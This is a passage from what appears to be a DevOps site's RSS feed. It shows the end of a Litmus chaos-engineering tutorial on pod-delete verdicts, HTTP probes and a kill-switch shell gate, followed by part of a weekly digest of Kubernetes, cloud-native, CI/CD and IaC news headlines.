<pre><code class="hljs language-yaml"><span class="hljs-attr">status:</span>
  <span class="hljs-attr">experimentStatus:</span>
    <span class="hljs-attr">phase:</span> <span class="hljs-string">Completed</span>
    <span class="hljs-attr">verdict:</span> <span class="hljs-string">Pass</span>
    <span class="hljs-attr">failStep:</span> <span class="hljs-string">&#x27;N/A&#x27;</span>
  <span class="hljs-attr">probeStatus:</span> []
</code></pre><p><code>Pass</code> means Litmus killed pods and the deployment kept the target replica count up through the run. <code>Fail</code> means a probe tripped (more on probes below) or the experiment could not target anything.</p>
<p>For the full story, check the events the runner emitted:</p>
<pre><code class="hljs language-bash">kubectl describe chaosresult web-pod-delete-pod-delete -n default
</code></pre><h2 id="h2-make-it-real-with-probes" class="group relative scroll-mt-24">
        <a href="#h2-make-it-real-with-probes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Make It Real With Probes
        </a>
        </h2><p>A <code>Pass</code> from <code>pod-delete</code> alone just means pods came back. It does not mean your users got served. Probes turn the experiment into a real SLO check. Litmus runs them during the chaos window and fails the result if the probe fails.</p>
<p>Add an <code>httpProbe</code> to the engine that hits the service every two seconds and expects a 200:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">experiments:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">probe:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">web-availability</span>
          <span class="hljs-attr">type:</span> <span class="hljs-string">httpProbe</span>
          <span class="hljs-attr">mode:</span> <span class="hljs-string">Continuous</span>
          <span class="hljs-attr">runProperties:</span>
            <span class="hljs-attr">probeTimeout:</span> <span class="hljs-number">2</span>
            <span class="hljs-attr">interval:</span> <span class="hljs-number">2</span>
            <span class="hljs-attr">retry:</span> <span class="hljs-number">1</span>
            <span class="hljs-attr">stopOnFailure:</span> <span class="hljs-literal">false</span>
          <span class="hljs-attr">httpProbe/inputs:</span>
            <span class="hljs-attr">url:</span> <span class="hljs-string">http://web.default.svc.cluster.local</span>
            <span class="hljs-attr">insecureSkipVerify:</span> <span class="hljs-literal">false</span>
            <span class="hljs-attr">method:</span>
              <span class="hljs-attr">get:</span>
                <span class="hljs-attr">criteria:</span> <span class="hljs-string">==</span>
                <span class="hljs-attr">responseCode:</span> <span class="hljs-string">&#x27;200&#x27;</span>
      <span class="hljs-attr">components:</span>
        <span class="hljs-attr">env:</span>
          <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">TOTAL_CHAOS_DURATION</span>
            <span class="hljs-attr">value:</span> <span class="hljs-string">&#x27;30&#x27;</span>
</code></pre><p>Re-apply. Now if even one HTTP check fails during the 30-second chaos window, the verdict flips to <code>Fail</code>. That is the signal you actually want: not &quot;pods recovered&quot; but &quot;users were served the whole time.&quot;</p>
<h2 id="h2-what-to-try-next" class="group relative scroll-mt-24">
        <a href="#h2-what-to-try-next" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What To Try Next
        </a>
        </h2><p>Once <code>pod-delete</code> passes with a probe, you have a working chaos loop. Use it. A short menu to work through, in roughly increasing pain:</p>
<ol>
<li><strong>container-kill</strong>: kill only the app container without taking the pod down. Surfaces broken restart logic and exposes anything that initializes only on pod start.</li>
<li><strong>pod-cpu-hog</strong> and <strong>pod-memory-hog</strong>: pin a pod&#39;s resources. Validates that HPA reacts and that your requests/limits are not lying.</li>
<li><strong>pod-network-loss</strong>: drop a percentage of packets between the target and the world. Excellent for finding retry storms and absent timeouts.</li>
<li><strong>node-drain</strong>: cordon and drain a node out from under the workload. The honest test of PodDisruptionBudgets.</li>
</ol>
<p>Two operational habits to build alongside the experiments:</p>
<ul>
<li><strong>Always set <code>engineState</code>, not just delete-on-cleanup.</strong> Patching the engine to <code>stop</code> is the kill switch. Keep that command in your runbook so the on-call can stop chaos in one line if something goes sideways: <code>kubectl patch chaosengine web-pod-delete -n default --type merge -p &#39;{&quot;spec&quot;:{&quot;engineState&quot;:&quot;stop&quot;}}&#39;</code>.</li>
<li><strong>Start in a non-prod cluster, then move to prod with a <code>PODS_AFFECTED_PERC</code> of 10 and a probe</strong>. Prod chaos without a probe is sabotage. Prod chaos with a probe is testing.</li>
</ul>
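<p>The verdict check from &quot;Read the Verdict&quot; and the kill switch above can be combined into one gate for a pipeline or runbook. This is an added example, not part of the original article or the Litmus project; the function name <code>chaos_gate</code>, its timeout behaviour and the <code>&lt;engine&gt;-&lt;experiment&gt;</code> result name (the pattern used on this page) are assumptions.</p>

```shell
#!/bin/sh
# Added example: wait for a ChaosResult, pass or fail on its verdict, and
# use the engineState kill switch if the run does not finish in time.
# Usage: chaos_gate ENGINE EXPERIMENT NAMESPACE [TIMEOUT_S] [POLL_S]
# Returns 0 on verdict Pass, 1 on any other verdict, 2 on timeout.

chaos_gate() {
  engine=$1
  experiment=$2
  ns=$3
  timeout=${4:-120}
  poll=${5:-5}
  # Result name as it appears on this page: web-pod-delete-pod-delete.
  result="${engine}-${experiment}"
  waited=0

  while :; do
    phase=$(kubectl get chaosresult "$result" -n "$ns" \
      -o jsonpath='{.status.experimentStatus.phase}' 2>/dev/null) || phase=""
    if [ "$phase" = "Completed" ]; then
      break
    fi
    if [ "$waited" -ge "$timeout" ]; then
      echo "no result after ${waited}s (phase=${phase:-unknown}); stopping engine" >&2
      # Kill switch from the article: patch engineState to stop.
      kubectl patch chaosengine "$engine" -n "$ns" --type merge \
        -p '{"spec":{"engineState":"stop"}}' >&2 \
        || echo "patch failed; stop the engine manually" >&2
      return 2
    fi
    sleep "$poll"
    waited=$((waited + poll))
  done

  verdict=$(kubectl get chaosresult "$result" -n "$ns" \
    -o jsonpath='{.status.experimentStatus.verdict}' 2>/dev/null) || verdict=""
  fail_step=$(kubectl get chaosresult "$result" -n "$ns" \
    -o jsonpath='{.status.experimentStatus.failStep}' 2>/dev/null) || fail_step=""

  if [ "$verdict" = "Pass" ]; then
    echo "verdict=Pass"
    return 0
  fi
  # Anything other than Pass on a completed run is treated as a failure.
  echo "verdict=${verdict:-unknown} failStep=${fail_step:-unknown}" >&2
  return 1
}
```

<p>For the engine in this walkthrough the call is <code>chaos_gate web-pod-delete pod-delete default</code>.</p>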
<p>Chaos engineering stops being scary the moment you have run the loop once. Pick one deployment this week, run <code>pod-delete</code> against it with an <code>httpProbe</code>, and find out whether your readiness probe was lying to you.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[DevOps Weekly Digest - Week 21, 2026]]></title>
      <link>https://devops-daily.com/news/2026-week-21</link>
      <description><![CDATA[⚡ Curated updates from Kubernetes, cloud native tooling, CI/CD, IaC, observability, and security - handpicked for DevOps professionals!]]></description>
      <pubDate>Mon, 18 May 2026 00:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/news/2026-week-21</guid>
      <category><![CDATA[DevOps News]]></category>
      <content:encoded><![CDATA[<blockquote>
<p>📌 <strong>Handpicked by DevOps Daily</strong> - Your weekly dose of curated DevOps news and updates!</p>
</blockquote>
<hr>
<h2 id="h2-kubernetes" class="group relative scroll-mt-24">
        <a href="#h2-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ⚓ Kubernetes
        </a>
        </h2><h3 id="h3-what-kubectl-debug-doesnt-tell-you-the-silent-evidence-gap" class="group relative scroll-mt-24">
        <a href="#h3-what-kubectl-debug-doesnt-tell-you-the-silent-evidence-gap" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What kubectl debug doesn’t tell you: The silent evidence gap
        </a>
        </h3><p>The session that left no record A kubectl debug session can contain the only direct observation of a failing system state. However, once the session ends, Kubernetes does not retain the termination co</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/18/what-kubectl-debug-doesnt-tell-you-the-silent-evidence-gap/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-kubernetes-v136-new-metric-for-route-sync-in-the-cloud-controller-manager" class="group relative scroll-mt-24">
        <a href="#h3-kubernetes-v136-new-metric-for-route-sync-in-the-cloud-controller-manager" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Kubernetes v1.36: New Metric for Route Sync in the Cloud Controller Manager
        </a>
        </h3><p>This article was originally published with the wrong date. It was later republished, dated the 15th of May 2026. Kubernetes v1.36 introduces a new alpha counter metric route_controller_route_sync_tota</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/05/15/ccm-new-metric-route-sync-total/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-kubernetes-v136-mixed-version-proxy-graduates-to-beta" class="group relative scroll-mt-24">
        <a href="#h3-kubernetes-v136-mixed-version-proxy-graduates-to-beta" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Kubernetes v1.36: Mixed Version Proxy Graduates to Beta
        </a>
        </h3><p>Back in Kubernetes 1.28, we introduced the Mixed Version Proxy (MVP) as an Alpha feature (under the feature gate UnknownVersionInteroperabilityProxy) in a previous blog post. The goal was simple but c</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/05/15/kubernetes-1-36-feature-mixed-version-proxy-beta/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-kubernetes-v136-deprecation-and-removal-of-service-externalips" class="group relative scroll-mt-24">
        <a href="#h3-kubernetes-v136-deprecation-and-removal-of-service-externalips" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Kubernetes v1.36: Deprecation and removal of Service ExternalIPs
        </a>
        </h3><p>The .spec.externalIPs field for Service was an early attempt to provide cloud-load-balancer-like functionality for non-cloud clusters. Unfortunately, the API assumes that every user in the cluster is </p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/05/14/kubernetes-v1-36-deprecation-and-removal-of-service-externalips/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-when-ai-agents-become-contributors-how-kubestellar-reached-81-pr-acceptance" class="group relative scroll-mt-24">
        <a href="#h3-when-ai-agents-become-contributors-how-kubestellar-reached-81-pr-acceptance" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 When AI agents become contributors: How KubeStellar reached 81% PR acceptance
        </a>
        </h3><p>In mid-December, I started building KubeStellar Console from scratch. It’s a multi-cluster management dashboard for Kubernetes, and it sits inside the KubeStellar project in the Cloud Native Computing</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/14/when-ai-agents-become-contributors-how-kubestellar-reached-81-pr-acceptance/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-kubernetes-v136-advancing-workload-aware-scheduling" class="group relative scroll-mt-24">
        <a href="#h3-kubernetes-v136-advancing-workload-aware-scheduling" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Kubernetes v1.36: Advancing Workload-Aware Scheduling
        </a>
        </h3><p>AI/ML and batch workloads introduce unique scheduling challenges that go beyond simple Pod-by-Pod scheduling. In Kubernetes v1.35, we introduced the first tranche of workload-aware scheduling improvem</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/05/13/kubernetes-v1-36-advancing-workload-aware-scheduling/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-maximizing-value-with-amazon-eks-auto-mode-strategies-for-visibility-control-and-optimization" class="group relative scroll-mt-24">
        <a href="#h3-maximizing-value-with-amazon-eks-auto-mode-strategies-for-visibility-control-and-optimization" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Maximizing value with Amazon EKS Auto Mode: Strategies for visibility, control, and optimization
        </a>
        </h3><p>In this post, we explore how to maximize Auto Mode&#39;s value through comprehensive cost visibility, proactive governance, and continuous optimization strategies. We cover essential cost management dimen</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/maximizing-value-with-amazon-eks-auto-mode-strategies-for-visibility-control-and-optimization/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-building-a-cloud-native-platform-from-the-ground-up-with-kairos-k0rdent-and-bindy" class="group relative scroll-mt-24">
        <a href="#h3-building-a-cloud-native-platform-from-the-ground-up-with-kairos-k0rdent-and-bindy" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Building a cloud native platform from the ground up with Kairos, k0rdent, and bindy
        </a>
        </h3><p>As we shared in our earlier post on FluxCD, RBC Capital Markets has been on a deliberate journey to modernize our Kubernetes platform. GitOps with FluxCD gave us a solid deployment foundation. But as </p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/13/building-a-cloud-native-platform-from-the-ground-up-with-kairos-k0rdent-and-bindy/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-kubernetes-at-uber-with-lucy-sweet" class="group relative scroll-mt-24">
        <a href="#h3-kubernetes-at-uber-with-lucy-sweet" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Kubernetes at Uber with Lucy Sweet
        </a>
        </h3><p>Guest is Lucy Sweet, a Staff Software engineer at Uber and the lead for the Kubernetes Node Lifecycle Working Group. Imagine trying to move millions of compute cores and thousands of microservices to </p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 Kubernetes Podcast</strong></p>
<p><a href="https://e780d51f-f115-44a6-8252-aed9216bb521.libsyn.com/kubernetes-at-uber-with-lucy-sweet"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-stop-managing-the-past-and-start-building-its-future" class="group relative scroll-mt-24">
        <a href="#h3-stop-managing-the-past-and-start-building-its-future" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Stop managing the past and start building IT’s future
        </a>
        </h3><p>We’re continuing to navigate a fundamental shift in digital infrastructure. Over the past 18 months, the predictability of the virtualization layer has shed nearly 20 years of stability driven by an u</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/stop-managing-past-and-start-building-its-future"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-red-hat-partner-ecosystem-a-year-of-expanding-choice-for-virtualized-workloads-on-red-hat-openshift-virtualization" class="group relative scroll-mt-24">
        <a href="#h3-red-hat-partner-ecosystem-a-year-of-expanding-choice-for-virtualized-workloads-on-red-hat-openshift-virtualization" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Red Hat partner ecosystem: A year of expanding choice for virtualized workloads on Red Hat OpenShift Virtualization
        </a>
        </h3><p>It has been about a year since the last review of Red Hat’s partner ecosystem for Red Hat OpenShift Virtualization. We&#39;ve had a lot of success in the infrastructure space, including improvements to st</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/red-hat-partner-ecosystem-year-expanding-choice-virtualized-workloads-red-hat-openshift-virtualization"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-back-up-and-restore-your-amazon-eks-cluster-resources-using-velero" class="group relative scroll-mt-24">
        <a href="#h3-back-up-and-restore-your-amazon-eks-cluster-resources-using-velero" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Back up and restore your Amazon EKS cluster resources using Velero
        </a>
        </h3><p>In this post, you&#39;ll learn to back up and restore Amazon EKS cluster resources and persistent volume data using Velero. You&#39;ll deploy a sample stateful application, back it up, and restore it to a dif</p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/back-up-and-restore-your-amazon-eks-cluster-resources-using-velero/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cloud-native" class="group relative scroll-mt-24">
        <a href="#h2-cloud-native" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ☁️ Cloud Native
        </a>
        </h2><h3 id="h3-custom-mcp-catalogs-and-profiles-advancing-enterprise-mcp-adoption" class="group relative scroll-mt-24">
        <a href="#h3-custom-mcp-catalogs-and-profiles-advancing-enterprise-mcp-adoption" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Custom MCP Catalogs and Profiles: Advancing Enterprise MCP Adoption
        </a>
        </h3><p>We’re excited to announce the general availability of Custom Catalogs and Profiles for managing Model Context Protocol (MCP) servers. These two complementary capabilities fundamentally change how team</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/create-custom-mcp-catalogs-and-profiles/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-extending-ai-gateways-with-rust-custom-transformations-in-agentgateway-and-kgateway" class="group relative scroll-mt-24">
        <a href="#h3-extending-ai-gateways-with-rust-custom-transformations-in-agentgateway-and-kgateway" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Extending AI gateways with Rust: Custom transformations in agentgateway and kgateway
        </a>
        </h3><p>Every gateway ships with a set of built-in policies. Authentication. Rate limiting. Request routing. Prompt guards. These cover most use cases. But what about the ones they don’t cover? What if you ne</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/15/extending-ai-gateways-with-rust-custom-transformations-in-agentgateway-and-kgateway/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-counting-to-3-with-a-new-builder-processing-50m-monthly-builds" class="group relative scroll-mt-24">
        <a href="#h3-counting-to-3-with-a-new-builder-processing-50m-monthly-builds" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Counting to 3 with a new builder processing 50M+ monthly builds
        </a>
        </h3><p>We replaced our Docker-buildx GCP autoscaler with a fleet of microVM build cells running BuildKit. Here&#39;s what we learned rolling it out.</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Railway Blog</strong></p>
<p><a href="https://blog.railway.com/p/new-builder-scale-big"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-nist-narrows-the-nvd-what-container-security-programs-should-reassess" class="group relative scroll-mt-24">
        <a href="#h3-nist-narrows-the-nvd-what-container-security-programs-should-reassess" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 NIST Narrows the NVD: What Container Security Programs Should Reassess
        </a>
        </h3><p>On April 15, NIST announced a prioritized enrichment model for the National Vulnerability Database. Most CVEs will still be published, but fewer will receive the CVSS scores, CPE mappings, and CWE cla</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/nist-narrows-the-nvd-what-container-security-programs-should-reassess/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-docker-ai-governance-unlock-agent-autonomy-safely" class="group relative scroll-mt-24">
        <a href="#h3-docker-ai-governance-unlock-agent-autonomy-safely" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Docker AI Governance: Unlock Agent Autonomy, Safely
        </a>
        </h3><p>Introducing Docker AI Governance: centralized control over how agents execute, what they can reach on the network, which credentials they can use, and which MCP tools they can call, so every developer</p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/docker-ai-governance-unlock-agent-autonomy-safely/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-implement-centralized-observability-for-multi-account-amazon-eks" class="group relative scroll-mt-24">
        <a href="#h3-implement-centralized-observability-for-multi-account-amazon-eks" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Implement centralized observability for multi-account Amazon EKS
        </a>
        </h3><p>This post shows you how to unify your existing Container Insights and CloudWatch data into a centralized monitoring hub using a hub-and-spoke architecture. You will unify fragmented observability data</p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/implement-centralized-observability-for-multi-account-amazon-eks/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cicd" class="group relative scroll-mt-24">
        <a href="#h2-cicd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔄 CI/CD
        </a>
        </h2><h3 id="h3-gitlab-act-2-still-an-open-book" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-act-2-still-an-open-book" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab Act 2: Still an Open Book
        </a>
        </h3><p>An analysis of GitLab’s &quot;Act 2&quot; transition under CEO Bill Staples, examining whether the company can successfully pivot to an AI-native, agentic software delivery model while dismantling the radically</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/gitlab-act-2-still-an-open-book/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-core-java-vs-enterprise-java-jakarta-ee-spring-boot-2026" class="group relative scroll-mt-24">
        <a href="#h3-core-java-vs-enterprise-java-jakarta-ee-spring-boot-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Core Java vs Enterprise Java: Jakarta EE &amp; Spring Boot 2026
        </a>
        </h3><p>Java SE, Jakarta EE, and Spring Boot have converged more than most teams realize. A 2026 guide to choosing — and standardizing — your enterprise Java stack.</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/jakarta-ee-vs-spring-boot"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-a-context-graph-actually-is-and-how-to-build-one" class="group relative scroll-mt-24">
        <a href="#h3-what-a-context-graph-actually-is-and-how-to-build-one" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What a Context Graph Actually Is, and How to Build One
        </a>
        </h3><p>Context graphs help AI agents reason through work by modeling how processes actually happen across your organization. This practical guide breaks down what they are, how they differ from knowledge gra</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/what-a-context-graph-actually-is-and-how-to-build-one"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-building-a-general-purpose-accessibility-agentand-what-we-learned-in-the-process" class="group relative scroll-mt-24">
        <a href="#h3-building-a-general-purpose-accessibility-agentand-what-we-learned-in-the-process" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Building a general-purpose accessibility agent—and what we learned in the process
        </a>
        </h3><p>Learn about the experimental general-purpose accessibility agent that GitHub is piloting.</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/ai-and-ml/github-copilot/building-a-general-purpose-accessibility-agent-and-what-we-learned-in-the-process/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-widespread-mini-shai-hulud-campaign-is-a-matter-of-trust" class="group relative scroll-mt-24">
        <a href="#h3-widespread-mini-shai-hulud-campaign-is-a-matter-of-trust" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Widespread Mini Shai-Hulud Campaign Is a Matter of Trust
        </a>
        </h3><p>The latest series of attacks using the notorious Shai-Hulud worm puts into sharp focus the threats facing software developers and their CI/CD pipelines, an issue that has been raised in recent months </p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/widespread-mini-shai-hulud-campaign-is-a-matter-of-trust/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-raising-the-bar-quality-shared-responsibility-and-the-future-of-githubs-bug-bounty-program" class="group relative scroll-mt-24">
        <a href="#h3-raising-the-bar-quality-shared-responsibility-and-the-future-of-githubs-bug-bounty-program" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Raising the bar: Quality, shared responsibility, and the future of GitHub’s bug bounty program
        </a>
        </h3><p>We&#39;re updating our bug bounty program standards to prioritize quality submissions, clarify shared responsibility boundaries, and evolve how we reward low-risk findings. The post Raising the bar: Quali</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/security/raising-the-bar-quality-shared-responsibility-and-the-future-of-githubs-bug-bounty-program/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-github-availability-report-april-2026" class="group relative scroll-mt-24">
        <a href="#h3-github-availability-report-april-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub availability report: April 2026
        </a>
        </h3><p>In April, we experienced 10 incidents that resulted in degraded performance across GitHub services. The post GitHub availability report: April 2026 appeared first on The GitHub Blog.</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/news-insights/company-news/github-availability-report-april-2026/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-latency-to-instant-modernizing-github-issues-navigation-performance" class="group relative scroll-mt-24">
        <a href="#h3-from-latency-to-instant-modernizing-github-issues-navigation-performance" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From latency to instant: Modernizing GitHub Issues navigation performance
        </a>
        </h3><p>How the GitHub Issues team used client-side caching, smart prefetching, and service workers to make navigation feel instant. The post From latency to instant: Modernizing GitHub Issues navigation perf</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/engineering/architecture-optimization/from-latency-to-instant-modernizing-github-issues-navigation-performance/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-automated-release-management-from-cabs-to-cd" class="group relative scroll-mt-24">
        <a href="#h3-automated-release-management-from-cabs-to-cd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Automated Release Management: From CABs to CD
        </a>
        </h3><p>Find out how policy-driven pipelines, continuous delivery and AI-assisted verification are replacing manual CAB processes with automated release management.</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/automated-release-management-from-cabs-to-continuous-delivery"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-harden-your-pipeline-perimeter-for-the-era-of-ai-assisted-coding" class="group relative scroll-mt-24">
        <a href="#h3-harden-your-pipeline-perimeter-for-the-era-of-ai-assisted-coding" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Harden your pipeline perimeter for the era of AI-assisted coding
        </a>
        </h3><p>AI-assisted development is moving faster than the security models built to govern it — agents write code, open merge requests, and ship changes at a pace where vulnerabilities go unnoticed. The proble</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/harden-pipeline-perimeter-for-ai-assisted-coding/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitlab-patch-release-18113-18106-1897" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-patch-release-18113-18106-1897" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab Patch Release: 18.11.3, 18.10.6, 18.9.7
        </a>
        </h3><p><strong>📅 May 13, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://docs.gitlab.com/releases/patches/patch-release-gitlab-18-11-3-released/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-iac" class="group relative scroll-mt-24">
        <a href="#h2-iac" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🏗️ IaC
        </a>
        </h2><h3 id="h3-ensure-code-integrity-for-aws-lambda-functions-with-automated-code-signing-using-terraform" class="group relative scroll-mt-24">
        <a href="#h3-ensure-code-integrity-for-aws-lambda-functions-with-automated-code-signing-using-terraform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Ensure Code Integrity for AWS Lambda Functions with Automated Code Signing Using Terraform
        </a>
        </h3><p>Authors: Sourav Kundu and Joyson Neville Lewis. In today’s cloud-native landscape, ensuring the integrity and authenticity of your serverless functions is critical for maintaining security and complia</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/ensure-code-integrity-for-aws-lambda-functions-with-automated-code-signing-using-terraform/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-cloudwatch-logs-announces-increased-query-result-limits" class="group relative scroll-mt-24">
        <a href="#h3-amazon-cloudwatch-logs-announces-increased-query-result-limits" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
